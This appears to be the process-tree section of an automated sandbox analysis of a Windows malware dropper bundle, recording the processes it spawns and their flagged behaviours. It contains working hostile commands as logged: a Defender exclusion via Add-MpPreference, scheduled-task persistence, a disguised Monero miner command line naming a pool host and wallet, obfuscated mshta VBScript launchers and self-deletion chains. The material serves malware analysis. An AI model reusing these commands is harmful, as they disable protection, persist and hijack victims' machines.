PID 4612 wrote to memory of 4900	4612	setup_install.exe	91
PID 4612 wrote to memory of 4900	4612	setup_install.exe	91
PID 4612 wrote to memory of 4928	4612	setup_install.exe	90
PID 4612 wrote to memory of 4928	4612	setup_install.exe	90
PID 4612 wrote to memory of 4928	4612	setup_install.exe	90
PID 4612 wrote to memory of 4952	4612	setup_install.exe	89
PID 4612 wrote to memory of 4952	4612	setup_install.exe	89
PID 4612 wrote to memory of 4952	4612	setup_install.exe	89
PID 4900 wrote to memory of 4968	4900	cmd.exe	88
PID 4900 wrote to memory of 4968	4900	cmd.exe	88
PID 4900 wrote to memory of 4968	4900	cmd.exe	88
PID 4816 wrote to memory of 4980	4816	cmd.exe	87
PID 4816 wrote to memory of 4980	4816	cmd.exe	87
PID 4816 wrote to memory of 4980	4816	cmd.exe	87
PID 4788 wrote to memory of 4992	4788	cmd.exe	75
PID 4788 wrote to memory of 4992	4788	cmd.exe	75
PID 4788 wrote to memory of 4992	4788	cmd.exe	75
PID 4612 wrote to memory of 5008	4612	setup_install.exe	76
PID 4612 wrote to memory of 5008	4612	setup_install.exe	76
PID 4612 wrote to memory of 5008	4612	setup_install.exe	76
PID 4612 wrote to memory of 5044	4612	setup_install.exe	77
PID 4612 wrote to memory of 5044	4612	setup_install.exe	77
PID 4612 wrote to memory of 5044	4612	setup_install.exe	77
PID 4856 wrote to memory of 5088	4856	cmd.exe	86
PID 4856 wrote to memory of 5088	4856	cmd.exe	86
PID 4856 wrote to memory of 5088	4856	cmd.exe	86
PID 4876 wrote to memory of 5100	4876	cmd.exe	78
PID 4876 wrote to memory of 5100	4876	cmd.exe	78
PID 4836 wrote to memory of 3196	4836	cmd.exe	85
PID 4836 wrote to memory of 3196	4836	cmd.exe	85
PID 4836 wrote to memory of 3196	4836	cmd.exe	85
PID 4800 wrote to memory of 3728	4800	cmd.exe	79
PID 4800 wrote to memory of 3728	4800	cmd.exe	79
PID 4800 wrote to memory of 3728	4800	cmd.exe	79
PID 4928 wrote to memory of 3208	4928	cmd.exe	80
PID 4928 wrote to memory of 3208	4928	cmd.exe	80
PID 5008 wrote to memory of 3780	5008	cmd.exe	84
PID 5008 wrote to memory of 3780	5008	cmd.exe	84
PID 5008 wrote to memory of 3780	5008	cmd.exe	84

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2996
- C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4516
- - C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4548
  - - C:\Users\Admin\AppData\Local\Temp\7zS4C1A9014\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS4C1A9014\setup_install.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:4612
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05ac1b0207d3ff3b8.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4800
      - C:\Users\Admin\AppData\Local\Temp\7zS4C1A9014\Sun05ac1b0207d3ff3b8.exe
        
        Sun05ac1b0207d3ff3b8.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Modifies system certificate store
        
        PID:3728
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Sun05ac1b0207d3ff3b8.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS4C1A9014\Sun05ac1b0207d3ff3b8.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:6080
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Sun05ac1b0207d3ff3b8.exe /f
        8⤵
        Kills process with taskkill
        
        PID:5448
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:2060
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05640630a6aa.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4856
      - C:\Users\Admin\AppData\Local\Temp\7zS4C1A9014\Sun05640630a6aa.exe
        
        Sun05640630a6aa.exe
        6⤵
        Executes dropped EXE
        
        PID:5088
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun054fe19a12cb3.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5008
      - C:\Users\Admin\AppData\Local\Temp\7zS4C1A9014\Sun054fe19a12cb3.exe
        
        Sun054fe19a12cb3.exe
        6⤵
        Executes dropped EXE
        
        PID:3780
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05fa3b4d2ae56e.exe /mixone
        5⤵
        
        PID:5044
      - C:\Users\Admin\AppData\Local\Temp\7zS4C1A9014\Sun05fa3b4d2ae56e.exe
        
        Sun05fa3b4d2ae56e.exe /mixone
        6⤵
        Executes dropped EXE
        
        PID:3144
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 656
        7⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4924
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 672
        7⤵
        Program crash
        
        PID:4200
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 680
        7⤵
        Program crash
        
        PID:1324
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 664
        7⤵
        Program crash
        
        PID:3800
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 888
        7⤵
        Program crash
        
        PID:2060
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 936
        7⤵
        Program crash
        
        PID:1768
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3144 -s 1100
        7⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:5772
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05899db881f67fb29.exe
        5⤵
        
        PID:4952
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun050462125c7d35.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4928
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05d60bc3b96248e5.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4900
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun059375dac544fc4a.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4876
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun05532f7abc.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4836
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Sun052bbd8bebd9.exe
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4816
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4788
- C:\Users\Admin\AppData\Local\Temp\E262.exe
  C:\Users\Admin\AppData\Local\Temp\E262.exe
  2⤵
  - Executes dropped EXE
  PID:6672
- C:\Users\Admin\AppData\Local\Temp\F743.exe
  C:\Users\Admin\AppData\Local\Temp\F743.exe
  2⤵
  - Executes dropped EXE
  PID:6072
- C:\Users\Admin\AppData\Local\Temp\26FE.exe
  C:\Users\Admin\AppData\Local\Temp\26FE.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5504
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\26FE.exe"
    3⤵
    PID:6448
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /T 10 /NOBREAK
      4⤵
      Delays execution with timeout.exe
      PID:5068
- C:\Users\Admin\AppData\Local\Temp\79D2.exe
  C:\Users\Admin\AppData\Local\Temp\79D2.exe
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3904
- C:\Users\Admin\AppData\Local\Temp\957A.exe
  C:\Users\Admin\AppData\Local\Temp\957A.exe
  2⤵
  - Executes dropped EXE
  PID:7028

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2820

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2800
- C:\Windows\system32\wbem\WMIADAP.EXE
  wmiadap.exe /F /T /R
  2⤵
  PID:5552

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
- Suspicious use of SetThreadContext
PID:2736
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:5436

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2512

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2500

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1868

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1440

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1272

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1264

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1100

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1044
- C:\Users\Admin\AppData\Roaming\jcsrdgu
  C:\Users\Admin\AppData\Roaming\jcsrdgu
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:5264
- C:\Users\Admin\AppData\Roaming\jcsrdgu
  C:\Users\Admin\AppData\Roaming\jcsrdgu
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:1456
- C:\Users\Admin\AppData\Roaming\jcsrdgu
  C:\Users\Admin\AppData\Roaming\jcsrdgu
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:5768

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:352

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4992

C:\Users\Admin\AppData\Local\Temp\7zS4C1A9014\Sun059375dac544fc4a.exe
Sun059375dac544fc4a.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5100
- C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
  2⤵
  - Executes dropped EXE
  PID:2768
- - C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
    3⤵
    - Executes dropped EXE
    PID:1080
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      4⤵
      PID:5296
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:5668
  - - C:\Users\Admin\AppData\Roaming\services64.exe
      "C:\Users\Admin\AppData\Roaming\services64.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      PID:4032
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        5⤵
        
        PID:6236
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        6⤵
        Creates scheduled task(s)
        
        PID:5884
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        5⤵
        Executes dropped EXE
        
        PID:6428
    - - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        5⤵
        
        PID:6724
- - C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
    "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1436
  - - C:\ProgramData\7784691.exe
      "C:\ProgramData\7784691.exe"
      4⤵
      Executes dropped EXE
      PID:4716
  - - C:\ProgramData\2796104.exe
      "C:\ProgramData\2796104.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: SetClipboardViewer
      PID:2760
  - - C:\ProgramData\2611909.exe
      "C:\ProgramData\2611909.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:1612
    - - C:\ProgramData\2611909.exe
        
        "C:\ProgramData\2611909.exe"
        5⤵
        Executes dropped EXE
        
        PID:1220
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 900
        5⤵
        Program crash
        
        PID:4852
  - - C:\ProgramData\2553830.exe
      "C:\ProgramData\2553830.exe"
      4⤵
      Executes dropped EXE
      PID:3800
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\2553830.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If """"== """" for %l In ( ""C:\ProgramData\2553830.exe"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
        5⤵
        
        PID:4724
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\2553830.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""=="" for %l In ( "C:\ProgramData\2553830.exe") do taskkill -Im "%~nxl" /F
        6⤵
        
        PID:368
        
        C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE
        
        C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9
        7⤵
        Executes dropped EXE
        
        PID:5528
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBSCrIPt: close (crEateobJeCt ("wsCRIpT.sHEll" ). RUN("C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " ,0 , TRuE))
        8⤵
        
        PID:5748
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 &If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "=="" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F
        9⤵
        
        PID:6040
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY
        8⤵
        Loads dropped DLL
        
        PID:5604
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -Im "2553830.exe" /F
        7⤵
        Kills process with taskkill
        
        PID:5680
  - - C:\ProgramData\2243519.exe
      "C:\ProgramData\2243519.exe"
      4⤵
      Executes dropped EXE
      PID:692
- - C:\Users\Admin\AppData\Local\Temp\2.exe
    "C:\Users\Admin\AppData\Local\Temp\2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1780
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1780 -s 1764
      4⤵
      Program crash
      PID:3828
- - C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    3⤵
    - Executes dropped EXE
    PID:2564
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 808
      4⤵
      Program crash
      Suspicious behavior: EnumeratesProcesses
      PID:4568
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 840
      4⤵
      Program crash
      PID:4216
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 888
      4⤵
      Program crash
      PID:4608
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 992
      4⤵
      Program crash
      PID:4840
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 844
      4⤵
      Program crash
      PID:3580
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 992
      4⤵
      Program crash
      PID:644
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 1048
      4⤵
      Suspicious use of NtCreateProcessExOtherParentProcess
      Program crash
      PID:5128
- - C:\Users\Admin\AppData\Local\Temp\udptest.exe
    "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
    3⤵
    - Executes dropped EXE
    PID:4400
- - C:\Users\Admin\AppData\Local\Temp\setup_2.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
    3⤵
    - Executes dropped EXE
    PID:4524
  - - C:\Users\Admin\AppData\Local\Temp\is-L1F4A.tmp\setup_2.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-L1F4A.tmp\setup_2.tmp" /SL5="$10202,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3244
    - - C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        5⤵
        Executes dropped EXE
        
        PID:916
      - C:\Users\Admin\AppData\Local\Temp\is-67H16.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-67H16.tmp\setup_2.tmp" /SL5="$A0136,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:1460
- - C:\Users\Admin\AppData\Local\Temp\3002.exe
    "C:\Users\Admin\AppData\Local\Temp\3002.exe"
    3⤵
    - Executes dropped EXE
    PID:4844
  - - C:\Users\Admin\AppData\Local\Temp\3002.exe
      "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
      4⤵
      PID:2828
- - C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
    "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
    3⤵
    - Executes dropped EXE
    PID:3700
- - C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
    "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
    3⤵
    PID:4032

C:\Users\Admin\AppData\Local\Temp\7zS4C1A9014\Sun050462125c7d35.exe
Sun050462125c7d35.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3208
- C:\ProgramData\7764075.exe
  "C:\ProgramData\7764075.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1508
- C:\ProgramData\5968156.exe
  "C:\ProgramData\5968156.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:2344
- - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
    3⤵
    - Executes dropped EXE
    PID:4192
- C:\ProgramData\5852696.exe
  "C:\ProgramData\5852696.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2212
- C:\ProgramData\7095334.exe
  "C:\ProgramData\7095334.exe"
  2⤵
  - Executes dropped EXE
  PID:4940

C:\Users\Admin\AppData\Local\Temp\is-P9IBO.tmp\Sun054fe19a12cb3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P9IBO.tmp\Sun054fe19a12cb3.tmp" /SL5="$60030,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4C1A9014\Sun054fe19a12cb3.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4204
- C:\Users\Admin\AppData\Local\Temp\is-QL94C.tmp\46807GHF____.exe
  "C:\Users\Admin\AppData\Local\Temp\is-QL94C.tmp\46807GHF____.exe" /S /UID=burnerch2
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Program Files directory
  PID:508
- - C:\Program Files\Windows Security\WKLLEUPVJP\ultramediaburner.exe
    "C:\Program Files\Windows Security\WKLLEUPVJP\ultramediaburner.exe" /VERYSILENT
    3⤵
    - Executes dropped EXE
    PID:5696
  - - C:\Users\Admin\AppData\Local\Temp\is-D7K6C.tmp\ultramediaburner.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-D7K6C.tmp\ultramediaburner.tmp" /SL5="$2031A,281924,62464,C:\Program Files\Windows Security\WKLLEUPVJP\ultramediaburner.exe" /VERYSILENT
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious use of FindShellTrayWindow
      PID:5936
    - - C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        5⤵
        Executes dropped EXE
        
        PID:5980
- - C:\Users\Admin\AppData\Local\Temp\3a-181a6-64a-db19a-d18aa0e45b72b\Wapuraekefu.exe
    "C:\Users\Admin\AppData\Local\Temp\3a-181a6-64a-db19a-d18aa0e45b72b\Wapuraekefu.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    PID:4756
- - C:\Users\Admin\AppData\Local\Temp\58-522a0-077-14c8a-3b780af3e68d2\Teqipyjegy.exe
    "C:\Users\Admin\AppData\Local\Temp\58-522a0-077-14c8a-3b780af3e68d2\Teqipyjegy.exe"
    3⤵
    - Executes dropped EXE
    PID:2828
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sxrcby2c.1ls\GcleanerEU.exe /eufive & exit
      4⤵
      PID:6652
    - - C:\Users\Admin\AppData\Local\Temp\sxrcby2c.1ls\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\sxrcby2c.1ls\GcleanerEU.exe /eufive
        5⤵
        Executes dropped EXE
        
        PID:7036
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r2by1tik.l2h\installer.exe /qn CAMPAIGN="654" & exit
      4⤵
      PID:6804
    - - C:\Users\Admin\AppData\Local\Temp\r2by1tik.l2h\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\r2by1tik.l2h\installer.exe /qn CAMPAIGN="654"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Modifies system certificate store
        Suspicious use of FindShellTrayWindow
        
        PID:6968
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\r2by1tik.l2h\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\r2by1tik.l2h\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631171461 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
        6⤵
        
        PID:2984
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3qk2er2a.ndh\anyname.exe & exit
      4⤵
      PID:7096
    - - C:\Users\Admin\AppData\Local\Temp\3qk2er2a.ndh\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\3qk2er2a.ndh\anyname.exe
        5⤵
        Executes dropped EXE
        
        PID:4792
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aprlyw3h.zak\gcleaner.exe /mixfive & exit
      4⤵
      PID:4436
    - - C:\Users\Admin\AppData\Local\Temp\aprlyw3h.zak\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\aprlyw3h.zak\gcleaner.exe /mixfive
        5⤵
        Executes dropped EXE
        
        PID:7072
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ln2nfvgs.3l2\autosubplayer.exe /S & exit
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:6696

C:\Users\Admin\AppData\Local\Temp\7zS4C1A9014\Sun05899db881f67fb29.exe
Sun05899db881f67fb29.exe
1⤵
- Executes dropped EXE
PID:3348

C:\Users\Admin\AppData\Local\Temp\7zS4C1A9014\Sun05532f7abc.exe
Sun05532f7abc.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3196

C:\Users\Admin\AppData\Local\Temp\7zS4C1A9014\Sun052bbd8bebd9.exe
Sun052bbd8bebd9.exe
1⤵
- Executes dropped EXE
PID:4980

C:\Users\Admin\AppData\Local\Temp\7zS4C1A9014\Sun05d60bc3b96248e5.exe
Sun05d60bc3b96248e5.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4968
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /f /im chrome.exe
  2⤵
  PID:5224
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im chrome.exe
    3⤵
    - Kills process with taskkill
    PID:5572

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5264
- C:\Windows\SysWOW64\rundll32.exe
